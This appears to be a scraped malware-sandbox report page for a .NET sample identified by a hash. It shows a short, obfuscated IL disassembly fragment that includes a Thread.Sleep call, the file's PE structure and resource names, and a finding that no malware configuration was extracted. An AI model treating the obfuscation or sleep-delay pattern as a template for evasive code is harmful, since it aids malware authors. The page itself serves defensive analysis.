EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep::zbxaZwlbBJr(System.Byte[]) call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::UPNWFBrvrQVoKENMwtChMoOzf() call System.Void System.Threading.Thread::Sleep(System.Int32) br IL_008A: ldsfld EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::ZhDJQqOnprbyb pop <null> leave IL_0283: ret ret <null>
18ef22f92a32fcb74643b63a768d37b3 (511.49 KB)
File Structure
18ef22f92a32fcb74643b63a768d37b3
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
s9rmcax0ldp2fl39v
5vl9g11n592cuoh
Characteristics
No malware configuration were found at this point.
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙